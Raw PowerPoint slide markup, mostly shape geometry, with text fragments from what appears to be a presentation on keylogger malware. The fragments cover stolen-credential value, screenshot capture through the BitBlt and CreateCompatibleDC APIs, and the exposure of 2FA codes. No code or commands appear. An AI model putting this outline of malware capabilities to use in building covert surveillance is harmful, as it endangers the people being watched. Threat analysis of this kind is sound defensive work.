                  <a:pt x="5300" y="77203"/>
                  <a:pt x="0" y="73693"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="103128"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="118955"/>
                  <a:pt x="35916" y="131774"/>
                  <a:pt x="80211" y="131774"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124505" y="131774"/>
                  <a:pt x="160421" y="118955"/>
                  <a:pt x="160421" y="103128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="160421" y="73693"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="160421" y="45835"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="160421" y="28647"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="160421" y="12819"/>
                  <a:pt x="124505" y="0"/>
                  <a:pt x="80211" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35916" y="0"/>
                  <a:pt x="0" y="12819"/>
                  <a:pt x="0" y="28647"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="45835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="61662"/>
                  <a:pt x="35916" y="74481"/>
                  <a:pt x="80211" y="74481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124505" y="74481"/>
                  <a:pt x="160421" y="61662"/>
                  <a:pt x="160421" y="45835"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="142696" y="139581"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="125902" y="145561"/>
                  <a:pt x="103808" y="148962"/>
                  <a:pt x="80211" y="148962"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56613" y="148962"/>
                  <a:pt x="34519" y="145561"/>
                  <a:pt x="17725" y="139581"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11423" y="137325"/>
                  <a:pt x="5300" y="134496"/>
                  <a:pt x="0" y="130987"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="154692"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="170519"/>
                  <a:pt x="35916" y="183338"/>
                  <a:pt x="80211" y="183338"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124505" y="183338"/>
                  <a:pt x="160421" y="170519"/>
                  <a:pt x="160421" y="154692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="160421" y="130987"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="155121" y="134496"/>
                  <a:pt x="149034" y="137325"/>
                  <a:pt x="142696" y="139581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7" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749854" y="5565921"/>
            <a:ext cx="5206809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4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Exfiltration Value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20681" y="5932598"/>
            <a:ext cx="2621738" cy="770021"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2621738" h="770021">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2585070" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2605321" y="0"/>
                  <a:pt x="2621738" y="16417"/>
                  <a:pt x="2621738" y="36668"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2621738" y="733353"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2621738" y="753604"/>
                  <a:pt x="2605321" y="770021"/>
                  <a:pt x="2585070" y="770021"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36668" y="770021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16431" y="770021"/>
                  <a:pt x="0" y="753590"/>
                  <a:pt x="0" y="733353"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36668"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36668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29" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="561932" y="6042601"/>
            <a:ext cx="2539236" cy="3300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65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85%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98600" y="6409278"/>
            <a:ext cx="2465901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1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of keyloggers also capture screenshots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249099" y="5932598"/>
            <a:ext cx="2621738" cy="770021"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2621738" h="770021">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2585070" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2605321" y="0"/>
                  <a:pt x="2621738" y="16417"/>
                  <a:pt x="2621738" y="36668"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2621738" y="733353"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2621738" y="753604"/>
                  <a:pt x="2605321" y="770021"/>
                  <a:pt x="2585070" y="770021"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36668" y="770021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16431" y="770021"/>
                  <a:pt x="0" y="753590"/>
                  <a:pt x="0" y="733353"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36668"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36668" y="0"/>
                </a:cubicBez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2" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3290350" y="6042601"/>
            <a:ext cx="2539236" cy="33000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65" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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$150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3327018" y="6409278"/>
            <a:ext cx="2465901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1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average value of stolen credential set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186638" y="1576710"/>
            <a:ext cx="5637654" cy="3153420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5637654" h="3153420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5637654" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5637654" y="3153420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3153420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5" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186638" y="1576710"/>
            <a:ext cx="36668" cy="3153420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="36668" h="3153420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36668" y="3153420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3153420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59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6" name="Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351643" y="1723380"/>
            <a:ext cx="440012" cy="440012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="440012" h="440012">
                <a:moveTo>
                  <a:pt x="36666" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="403346" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="423596" y="0"/>
                  <a:pt x="440012" y="16416"/>
                  <a:pt x="440012" y="36666"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="440012" y="403346"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440012" y="423596"/>
                  <a:pt x="423596" y="440012"/>
                  <a:pt x="403346" y="440012"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36666" y="440012"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16416" y="440012"/>
                  <a:pt x="0" y="423596"/>
                  <a:pt x="0" y="403346"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36666"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16430"/>
                  <a:pt x="16430" y="0"/>
                  <a:pt x="36666" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="3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7" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6461646" y="1833383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27501" y="13750"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12332" y="13750"/>
                  <a:pt x="0" y="26083"/>
                  <a:pt x="0" y="41251"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="151254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="166423"/>
                  <a:pt x="12332" y="178755"/>
                  <a:pt x="27501" y="178755"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="89377" y="178755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82502" y="199380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51564" y="199380"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45849" y="199380"/>
                  <a:pt x="41251" y="203978"/>
                  <a:pt x="41251" y="209693"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41251" y="215408"/>
                  <a:pt x="45849" y="220006"/>
                  <a:pt x="51564" y="220006"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168442" y="220006"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="174157" y="220006"/>
                  <a:pt x="178755" y="215408"/>
                  <a:pt x="178755" y="209693"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178755" y="203978"/>
                  <a:pt x="174157" y="199380"/>
                  <a:pt x="168442" y="199380"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="137504" y="199380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130629" y="178755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192505" y="178755"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="207674" y="178755"/>
                  <a:pt x="220006" y="166423"/>
                  <a:pt x="220006" y="151254"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="220006" y="41251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="220006" y="26083"/>
                  <a:pt x="207674" y="13750"/>
                  <a:pt x="192505" y="13750"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27501" y="13750"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41251" y="41251"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="178755" y="41251"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186361" y="41251"/>
                  <a:pt x="192505" y="47396"/>
                  <a:pt x="192505" y="55002"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="192505" y="123753"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="192505" y="131359"/>
                  <a:pt x="186361" y="137504"/>
                  <a:pt x="178755" y="137504"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="41251" y="137504"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="33645" y="137504"/>
                  <a:pt x="27501" y="131359"/>
                  <a:pt x="27501" y="123753"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="27501" y="55002"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="27501" y="47396"/>
                  <a:pt x="33645" y="41251"/>
                  <a:pt x="41251" y="41251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38" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6938325" y="1723380"/>
            <a:ext cx="4830965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4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Screen Capture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6938325" y="2053389"/>
            <a:ext cx="4739296" cy="843356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4739296" h="843356">
                <a:moveTo>
                  <a:pt x="36669" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4702627" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4722879" y="0"/>
                  <a:pt x="4739296" y="16417"/>
                  <a:pt x="4739296" y="36669"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4739296" y="806687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4739296" y="826939"/>
                  <a:pt x="4722879" y="843356"/>
                  <a:pt x="4702627" y="843356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36669" y="843356"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16417" y="843356"/>
                  <a:pt x="0" y="826939"/>
                  <a:pt x="0" y="806687"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36669"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36669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0" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048328" y="2181610"/>
            <a:ext cx="485847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BitBlt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1161065" y="2163392"/>
            <a:ext cx="403344" cy="220006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="403344" h="220006">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="366676" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="386914" y="0"/>
                  <a:pt x="403344" y="16431"/>
                  <a:pt x="403344" y="36668"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="403344" y="183338"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="403344" y="203589"/>
                  <a:pt x="386927" y="220006"/>
                  <a:pt x="366676" y="220006"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36668" y="220006"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16431" y="220006"/>
                  <a:pt x="0" y="203575"/>
                  <a:pt x="0" y="183338"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36668"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36668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2" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11161065" y="2163392"/>
            <a:ext cx="458346" cy="220006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="73335" tIns="36668" rIns="73335" bIns="36668" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="866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048328" y="2419950"/>
            <a:ext cx="4583459" cy="36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Performs bit-block transfers from the screen device context, capturing visual content.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938325" y="2969965"/>
            <a:ext cx="4739296" cy="843356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4739296" h="843356">
                <a:moveTo>
                  <a:pt x="36669" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4702627" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4722879" y="0"/>
                  <a:pt x="4739296" y="16417"/>
                  <a:pt x="4739296" y="36669"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4739296" y="806687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4739296" y="826939"/>
                  <a:pt x="4722879" y="843356"/>
                  <a:pt x="4702627" y="843356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36669" y="843356"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16417" y="843356"/>
                  <a:pt x="0" y="826939"/>
                  <a:pt x="0" y="806687"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36669"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36669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5" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048328" y="3098185"/>
            <a:ext cx="1338370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E0A45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CreateCompatibleDC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1161065" y="3079968"/>
            <a:ext cx="403344" cy="220006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="403344" h="220006">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="366676" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="386914" y="0"/>
                  <a:pt x="403344" y="16431"/>
                  <a:pt x="403344" y="36668"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="403344" y="183338"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="403344" y="203589"/>
                  <a:pt x="386927" y="220006"/>
                  <a:pt x="366676" y="220006"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36668" y="220006"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16431" y="220006"/>
                  <a:pt x="0" y="203575"/>
                  <a:pt x="0" y="183338"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="36668"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16431"/>
                  <a:pt x="16431" y="0"/>
                  <a:pt x="36668" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FB2C36">
              <a:alpha val="20000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47" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11161065" y="3079968"/>
            <a:ext cx="458346" cy="220006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="73335" tIns="36668" rIns="73335" bIns="36668" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="866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048328" y="3336525"/>
            <a:ext cx="4583459" cy="36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E1E3E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Creates memory device contexts compatible with the screen for off-screen rendering.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956659" y="3923208"/>
            <a:ext cx="4720962" cy="660018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4720962" h="660018">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4684292" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4704544" y="0"/>
                  <a:pt x="4720962" y="16418"/>
                  <a:pt x="4720962" y="36671"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4720962" y="623347"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4720962" y="643600"/>
                  <a:pt x="4704544" y="660018"/>
                  <a:pt x="4684292" y="660018"/>
                </a:cubicBez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E0A458">
              <a:alpha val="10196"/>
            </a:srgbClr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0" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6956659" y="3923208"/>
            <a:ext cx="36668" cy="660018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="36668" h="660018">
                <a:moveTo>
                  <a:pt x="36668" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36668" y="660018"/>
                </a:ln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1" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094163" y="4062547"/>
            <a:ext cx="165005" cy="146671"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="165005" h="146671">
                <a:moveTo>
                  <a:pt x="82502" y="9167"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59356" y="9167"/>
                  <a:pt x="40821" y="19709"/>
                  <a:pt x="27329" y="32256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13922" y="44717"/>
                  <a:pt x="4956" y="59585"/>
                  <a:pt x="688" y="69812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-258" y="72075"/>
                  <a:pt x="-258" y="74596"/>
                  <a:pt x="688" y="76859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4956" y="87086"/>
                  <a:pt x="13922" y="101982"/>
                  <a:pt x="27329" y="114415"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40821" y="126933"/>
                  <a:pt x="59356" y="137504"/>
                  <a:pt x="82502" y="137504"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105649" y="137504"/>
                  <a:pt x="124183" y="126962"/>
                  <a:pt x="137676" y="114415"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="151082" y="101953"/>
                  <a:pt x="160049" y="87086"/>
                  <a:pt x="164317" y="76859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="165262" y="74596"/>
                  <a:pt x="165262" y="72075"/>
                  <a:pt x="164317" y="69812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160049" y="59585"/>
                  <a:pt x="151082" y="44689"/>
                  <a:pt x="137676" y="32256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124183" y="19738"/>
                  <a:pt x="105649" y="9167"/>
                  <a:pt x="82502" y="9167"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41251" y="73335"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="41251" y="50568"/>
                  <a:pt x="59735" y="32084"/>
                  <a:pt x="82502" y="32084"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105269" y="32084"/>
                  <a:pt x="123753" y="50568"/>
                  <a:pt x="123753" y="73335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123753" y="96102"/>
                  <a:pt x="105269" y="114586"/>
                  <a:pt x="82502" y="114586"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59735" y="114586"/>
                  <a:pt x="41251" y="96102"/>
                  <a:pt x="41251" y="73335"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="82502" y="55002"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="82502" y="65114"/>
                  <a:pt x="74281" y="73335"/>
                  <a:pt x="64168" y="73335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60874" y="73335"/>
                  <a:pt x="57780" y="72476"/>
                  <a:pt x="55087" y="70929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54801" y="74052"/>
                  <a:pt x="55059" y="77260"/>
                  <a:pt x="55918" y="80440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59843" y="95107"/>
                  <a:pt x="74940" y="103815"/>
                  <a:pt x="89607" y="99891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104274" y="95966"/>
                  <a:pt x="112982" y="80869"/>
                  <a:pt x="109058" y="66202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105563" y="53111"/>
                  <a:pt x="93159" y="44775"/>
                  <a:pt x="80096" y="45921"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81614" y="48585"/>
                  <a:pt x="82502" y="51678"/>
                  <a:pt x="82502" y="55002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2" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7321268" y="4033211"/>
            <a:ext cx="4319686" cy="4400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E1E3E6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Surveillance:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3E6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Provides visual access to sensitive information like 2FA codes.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6186638" y="4876567"/>
            <a:ext cx="5637654" cy="1980054"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5637654" h="1980054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5637654" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5637654" y="1980054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1980054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333842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4" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186638" y="4876567"/>
            <a:ext cx="36668" cy="1980054"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="36668" h="1980054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36668" y="1980054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1980054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0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5" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6363101" y="5059906"/>
            <a:ext cx="206256" cy="183338"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="206256" h="183338">
                <a:moveTo>
                  <a:pt x="34376" y="22917"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21736" y="22917"/>
                  <a:pt x="11459" y="33194"/>
                  <a:pt x="11459" y="45835"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11459" y="137504"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11459" y="150144"/>
                  <a:pt x="21736" y="160421"/>
                  <a:pt x="34376" y="160421"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="126045" y="160421"/>
